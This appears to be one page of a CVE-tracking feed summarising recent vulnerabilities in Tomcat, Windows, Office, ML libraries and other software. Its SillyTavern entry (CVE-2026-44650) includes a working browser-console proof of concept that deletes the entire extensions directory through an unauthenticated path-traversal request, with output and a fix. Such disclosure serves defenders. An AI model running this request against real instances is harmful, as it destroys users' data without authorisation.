Skip to main content
CVE-2026-31242 CRITICAL Act Now

Unauthenticated remote attackers can completely destroy the mem0 v1.0.0 memory database by sending a DELETE request to the /memories endpoint, which executes DROP TABLE SQL statements without authentication or authorization checks. This causes irreversible data loss and total service denial for all users. EPSS score of 0.03% suggests low observed exploitation probability despite the CVSS 9.1 critical rating, likely due to mem0's limited deployment footprint. No public exploit code or active exploitation (CISA KEV) confirmed at time of analysis, but SSVC indicates the vulnerability is automatable with a single HTTP request.

Authentication Bypass Denial Of Service
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-43515 CRITICAL PATCH GHSA Act Now

Improper Authorization vulnerability when multiple method constraints define an HTTP method for the same extension in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

Authentication Bypass Apache Tomcat Suse Red Hat
NVD VulDB HeroDevs
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-30805 CRITICAL Act Now

Authentication bypass in Pandora FMS versions 777-800 allows remote attackers to gain unauthorized API access via insecure default resource initialization. The vulnerability stems from CWE-1188 (default credentials or configuration), enabling attackers to bypass authentication mechanisms and access the API with high confidentiality and integrity impact. CVSS 4.0 scores this at 9.1 CRITICAL due to network attack vector requiring no privileges or user interaction, though attack complexity is high and specific timing conditions apply (AT:P). No CISA KEV listing or public POC identified at time of analysis, suggesting exploitation requires vendor-specific knowledge of the insecure defaults.

Authentication Bypass Pandora Fms
NVD
CVSS 4.0
9.1
EPSS
0.0%
CVE-2026-41872 CRITICAL Act Now

Man-in-the-middle attacks against Kura Sushi Official App for Android and iOS allow complete interception and modification of push notification traffic due to improper SSL/TLS certificate validation. Attackers on the network path between the mobile app and EPG's notification server can read confidential data (VC:H) and inject arbitrary notifications or commands (VI:H) without authentication or user interaction. The vulnerability affects both Android and iOS versions of the official ordering app from Japanese restaurant chain Kura Sushi. EPSS and KEV data not available; exploitation requires network position but no special credentials or app configuration.

Information Disclosure Kura Sushi Official App For Android Kura Sushi Official App For Ios
NVD VulDB
CVSS 4.0
9.1
EPSS
0.0%
CVE-2026-27851 CRITICAL PATCH Act Now

Authentication-layer injection in OX Dovecot Pro (versions up to and including 2.4.3 and 3.1.4) arises from a flaw in the 'safe' template filter: when 'safe' is applied during variable expansion, every subsequent pipeline stage on the same string inherits the 'safe' designation, so attacker-controlled data that should be escaped is passed through unescaped. Because variable expansion is used to build authentication backend queries, this enables SQL or LDAP injection by remote unauthenticated attackers. There is no public exploit identified at time of analysis, and EPSS exploitation probability is negligible (0.01%, 2nd percentile).

Code Injection Ox Dovecot Pro
NVD VulDB
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-44650 CRITICAL PATCH GHSA Act Now

## Summary `POST /api/extensions/delete` endpoint accepts `extensionName: "."` which bypasses `sanitize-filename` validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. ## Affected File `src/endpoints/extensions.js` (last modified: commit `3ad9b05e2`) ## Root Cause The validation check occurs **before** sanitization: ```javascript // [1] "." is truthy - passes the check if (!request.body.extensionName) { return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. ## Proof of Concept Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] ## Impact - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. ## Same Pattern in Other Endpoints The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ## Suggested Fix ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. ## References - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

Microsoft Node.js CSRF Path Traversal
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-40368 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.0
EPSS
0.3%
CVE-2026-35555 HIGH CISA Act Now

PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

Authentication Bypass Powersystem Center 2024 Powersystem Center 2026
NVD GitHub
CVSS 4.0
7.0
EPSS
0.0%
CVE-2026-7256 HIGH This Week

Command injection in Zyxel WRE6505 v2 firmware V1.00(ABDV.3)C0 allows unauthenticated adjacent network attackers to execute arbitrary operating system commands via crafted HTTP requests to the CGI interface. This vulnerability affects an end-of-life product with no vendor support, meaning no security patches will be released. Exploitation requires adjacent network access (same LAN segment) but no authentication, making it exploitable by any device on the local network including compromised IoT devices or malicious insiders.

Zyxel Command Injection
NVD VulDB
CVSS 3.1
8.8
EPSS
0.8%
CVE-2024-54017 MEDIUM CISA This Month

A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions < V11.0), SIPROTEC 5 6MD85 (CP200) (All versions), SIPROTEC 5 6MD85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Information Disclosure Siprotec 5 6Md84 Cp300 Siprotec 5 6Md85 Cp200 Siprotec 5 6Md85 Cp300 Siprotec 5 6Md86 Cp200 +59
NVD VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-33570 MEDIUM CISA This Month

PowerSYSTEM Center REST API endpoint for devices allows a low privilege authenticated user to access information normally limited by operational permissions.

Authentication Bypass Powersystem Center 2020
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-20887 HIGH This Week

Improper access control for some Intel Vision software for all versions within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable remote code execution. This result may potentially occur via network access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (low) and availability (low) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Authentication Bypass Denial Of Service Intel RCE
NVD
CVSS 4.0
8.8
EPSS
0.2%
CVE-2026-23819 HIGH This Week

A vulnerability in the web-based management interface of Access Points running AOS-10 and AOS-8 Instant could allow an unauthenticated remote attacker to execute arbitrary JavaScript code in a victim's browser within the same local network. Successful exploitation could allow an attacker to compromise user data and potentially manipulate device configuration settings.

XSS Arubaos Aos
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-34344 HIGH PATCH Exploit Unlikely This Week

Type confusion vulnerability in Windows Ancillary Function Driver for WinSock enables local authenticated users to escalate privileges to SYSTEM level on Windows 10 (versions 1607-22H2), Windows 11 (versions 22H3-26H1), and Windows Server 2012. Microsoft has released patches through their March 2026 security update cycle. The vulnerability requires low-privilege local access but no user interaction, making it a high-value target for post-compromise lateral movement and persistence. CVSS 7.8 reflects complete system compromise potential, though EPSS data and KEV status are not available for this future-dated CVE.

Microsoft Information Disclosure Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-34329 HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Windows Message Queuing (MSMQ) allows remote unauthenticated attackers on adjacent networks to execute arbitrary code with high impact to confidentiality, integrity, and availability across multiple Windows versions. Microsoft released patches via their May 2026 security update. The vulnerability requires adjacent network access (same subnet/VLAN) but no authentication, user interaction, or special configuration, making it exploitable against default Windows installations where MSMQ service is enabled. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31225 HIGH GHSA This Week

Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.

Python Code Injection RCE
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41088 HIGH PATCH This Week

External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-32204 HIGH PATCH Exploit Unlikely This Week

Path traversal in Azure Monitor Agent enables low-privileged local attackers to escalate to SYSTEM/root privileges via malicious file path manipulation. Microsoft has released security patches. Attack vector is local (AV:L) with low complexity (AC:L), requiring only basic local credentials (PR:L) but no user interaction. EPSS exploitation probability is 0.04% (4th percentile), indicating low likelihood of mass exploitation, though the attack is straightforward once local access is obtained.

Microsoft Information Disclosure Azure Monitor
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-31224 HIGH GHSA This Week

Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31222 HIGH GHSA This Week

Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.

Checkpoint Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31218 HIGH This Week

Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.

Python RCE Deserialization N A
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31223 HIGH GHSA This Week

Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.

Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31219 HIGH This Week

Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.

Python RCE Deserialization N A
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40362 HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40359 HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-42831 HIGH PATCH NEWS This Week

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40360 HIGH PATCH This Week

Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.

Microsoft Information Disclosure Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-31232 HIGH This Week

The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41611 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of script-related html tags in a web page (basic xss) in Visual Studio Code allows an unauthorized attacker to execute code locally.

XSS Visual Studio Code
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-41095 HIGH PATCH Exploit Unlikely This Week

Use after free in Data Deduplication allows an authorized attacker to elevate privileges locally.

Denial Of Service Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40419 HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-35420 HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34343 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows Application Identity (AppID) Subsystem allows low-privileged authenticated users to execute code as SYSTEM via heap buffer overflow. Microsoft has released security patches across Windows 10 (versions 1607-22H2), Windows 11 (versions 22H3-26H1), and Windows Server 2012. CVSS 7.8 score reflects high impact to confidentiality, integrity, and availability. EPSS data not available; no confirmed active exploitation or public POC identified at time of analysis. Requires existing local access with standard user privileges, limiting remote attack surface.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-33841 HIGH PATCH Exploit Likely This Week

Local privilege escalation in Windows Kernel across Windows 10, Windows 11 (versions 22H3 through 26H1), and Windows Server 2022 allows authenticated local attackers to gain SYSTEM-level privileges through heap corruption. Microsoft has released patches addressing this CWE-122 heap-based buffer overflow. EPSS data not available for risk quantification, and no CISA KEV listing indicates exploitation has not been publicly confirmed, though the vulnerability's low attack complexity (AC:L) and minimal prerequisites (PR:L) make it attractive for post-compromise privilege escalation in targeted attacks.

Heap Overflow Microsoft Buffer Overflow Windows 10 Version 21H2 Windows 10 Version 22H2 +9
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-43892 HIGH PATCH This Week

AntSword is a cross-platform website management toolkit. Prior to 2.1.16, incomplete noxss() sanitization leads to 1-click RCE via jquery.terminal format code injection. This vulnerability is fixed in 2.1.16.

XSS
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40381 HIGH PATCH Exploit Unlikely This Week

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40420 HIGH PATCH Exploit Unlikely This Week

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-35436 HIGH PATCH Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40417 HIGH PATCH Exploit Unlikely This Week

Weak authentication in Dynamics Business Central allows an authorized attacker to elevate privileges locally.

Information Disclosure Microsoft Dynamics 365 Business Central 2024 Release Wave 2 Microsoft Dynamics 365 Business Central 2026 Release Wave 1 Microsoft Dynamics 365 Business Central Release Wave 1 2025 Microsoft Dynamics 365 Business Central Release Wave 2 2025
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-2465 HIGH PATCH This Week

Privilege escalation in Turboard FOR-S allows remote unauthenticated attackers to gain elevated access by exploiting incorrect authorization checks, requiring only user interaction. The vulnerability affects versions 7.01.2026 through 17.02.2026, with fix available in version 18.02.2026. Turkish national CERT (TR-CERT) reported this authorization bypass vulnerability (CWE-863), which enables attackers to compromise confidentiality, integrity, and availability of the affected business intelligence platform.

Authentication Bypass Privilege Escalation Turboard For S
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-6001 HIGH This Week

Authorization bypass in BAPSİS web application enables unauthenticated remote attackers to exploit trusted identifiers through user-controlled keys when victims interact with crafted requests. ABIS Technology's BAPSİS platform (versions before v.202604152042) contains a CWE-639 flaw where authorization checks rely on client-controlled key values, allowing attackers to manipulate trust relationships and gain unauthorized access with high impact to confidentiality, integrity, and availability. TR-CERT published advisory but no public exploit code identified at time of analysis, with CVSS 8.8 reflecting network-exploitable attack requiring only user interaction.

Authentication Bypass Bapsi S
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40398 HIGH PATCH Exploit Likely This Week

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7474 HIGH PATCH GHSA This Week

HashiCorp Nomad and Nomad Enterprise prior to 2.0.1 are vulnerable to code execution on the client host through a path traversal attack. This vulnerability (CVE-2026-7474) is fixed in Nomad 2.0.1, 1.11.5 and 1.10.11.

RCE Hashicorp Path Traversal
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40369 HIGH PATCH Exploit Likely This Week

Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure Windows 11 Version 24H2 Windows 11 Version 25H2 Windows 11 Version 26H1 +2
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2025-53844 HIGH This Week

Remote code execution in Fortinet FortiOS 7.2.0-7.2.11, 7.4.0-7.4.8, and 7.6.0-7.6.3 enables authenticated attackers to execute arbitrary code via malformed network packets. The out-of-bounds write vulnerability (CWE-787) affects FortiOS firewall appliances and requires only low-privilege credentials to exploit over the network. Fortinet published advisory FG-IR-26-123 confirming the vulnerability. No CISA KEV listing or public exploit code identified at time of analysis, though the straightforward network attack vector (AV:N/AC:L) suggests moderate weaponization potential once details emerge.

Fortinet Memory Corruption Buffer Overflow
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40403 HIGH PATCH NEWS Exploit Unlikely This Week

Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-8389 HIGH PATCH This Week

Memory corruption in Mozilla Firefox versions prior to 150.0.3 stems from a JIT (Just-In-Time) compiler miscompilation in the JavaScript engine, allowing remote attackers to trigger high-impact compromise of confidentiality, integrity, and availability when a user visits a malicious web page. The flaw carries a CVSS score of 8.8 and requires user interaction (loading attacker-controlled JavaScript), but no authentication. There is no public exploit identified at time of analysis, though a GitHub repository referenced from NVD suggests early proof-of-concept research, and EPSS scores the exploitation probability at only 0.02% despite the high CVSS severity.

Buffer Overflow Mozilla
NVD VulDB GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-42289 HIGH This Week

ChurchCRM is an open-source church management system. Prior to 7.3.2, UserEditor.php processes user account creation and permission updates entirely through $_POST parameters with no CSRF token validation. An unauthenticated attacker can craft a malicious HTML page that, when visited by an authenticated administrator, silently elevates any low-privilege user to full administrator or creates a new admin backdoor account without the victim's knowledge This vulnerability is fixed in 7.3.2.

Privilege Escalation PHP CSRF
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2025-43524 HIGH PATCH This Week

An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.2. An app may be able to break out of its sandbox.

Authentication Bypass Apple
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-8111 HIGH This Week

SQL injection in Ivanti Endpoint Manager web console enables authenticated remote attackers to execute arbitrary code on the server. Affects all versions prior to 2024 SU6. Attack requires only low-privilege authenticated access (CVSS PR:L) with low complexity (AC:L), making exploitation straightforward for any authenticated user. Ivanti has released patched version 2024 SU6 per vendor advisory dated May 2026. No CISA KEV listing or public exploit code identified at time of analysis, indicating exploitation not yet confirmed in the wild despite high severity score.

RCE SQLi Ivanti
NVD
CVSS 3.1
8.8
EPSS
0.3%
Prev Page 3 of 11 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy